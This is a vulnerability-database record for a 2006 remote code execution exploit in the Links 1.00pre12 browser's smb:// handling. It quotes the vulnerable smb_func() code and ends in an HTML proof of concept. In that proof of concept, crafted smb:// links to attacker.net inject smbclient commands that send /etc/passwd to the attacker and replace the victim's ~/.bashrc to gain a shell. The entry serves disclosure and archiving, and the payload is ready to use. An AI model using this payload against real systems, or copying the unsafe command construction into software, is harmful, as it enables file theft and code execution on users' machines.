DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-8784", "type": "zdt", "bulletinFamily": "exploit", "title": "Links 1.00pre12 (smbclient) Remote Code Execution Exploit", "description": "Exploit for multiple platform in category remote exploits", "published": "2006-11-14T00:00:00", "modified": "2006-11-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/8784", "reporter": "Teemu Salmela", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-09T09:51:51", "viewCount": 9, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/8784", "sourceData": "=========================================================\r\nLinks 1.00pre12 (smbclient) Remote Code Execution Exploit\r\n=========================================================\r\n\r\n<!--\r\nLinks smbclient command execution\r\n-----------------------------------------------------------------------------\r\nThere is a flaw in the Links web browser, that allows malicious web sites to\r\nexecute smbclient commands on the victim's machine. This flaw makes it\r\npossible to read any file from the victim system (any file that the user\r\nrunning links has read access), or to upload any file to the victim system\r\n(any file that the user running links can create/overwrite). The attacker\r\ncould, for example, upload ~/.bashrc to gain shell access.\r\n\r\nVersion numbers:\r\n-----------------------------------------------------------------------------\r\nI tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also\r\nbe installed.\r\n\r\nVulnerable code:\r\n-----------------------------------------------------------------------------\r\nsmb_func() in smb.c:\r\n ...\r\n 143 if (*share) {\r\n 144 if (!*dir || dir[strlen(dir) - 1] == '/'\r\n|| dir[strlen(dir) - 1] == '\\\\') {\r\n 145 if (dir) {\r\n 146 v[n++] = \"-D\";\r\n 147 v[n++] = dir;\r\n 148 }\r\n 149 v[n++] = \"-c\";\r\n 150 v[n++] = \"ls\";\r\n 151 } else {\r\n 152 unsigned char *ss;\r\n 153 unsigned char *s = stracpy(\"get\r\n\\\"\");\r\n'dir' is the directory part of the smb://.. url:\r\n 154 add_to_strn(&s, dir);\r\n 155 add_to_strn(&s, \"\\\" -\");\r\n 156 while ((ss = strchr(s, '/')))\r\n*ss = '\\\\';\r\n 157 v[n++] = \"-c\";\r\n 158 v[n++] = s;\r\n 159 }\r\n 160 }\r\n 161 v[n++] = NULL;\r\nsmbclient is executed:\r\n 162 execvp(\"smbclient\", (char **)v);\r\n 163 fprintf(stderr, \"smbclient not found in $PATH\");\r\n 164 _exit(1);\r\n ...\r\n-->\r\n<html>\r\n<a href='smb://attacker.net/work/XXX\" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a>\r\n<a href='smb://attacker.net/work/XXX\" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>\r\n</html>\r\n\r\n\n# 0day.today [2018-04-09] #", "_state": {"dependencies": 1646626989, "score": 1659766679, "epss": 1678811959}}

{}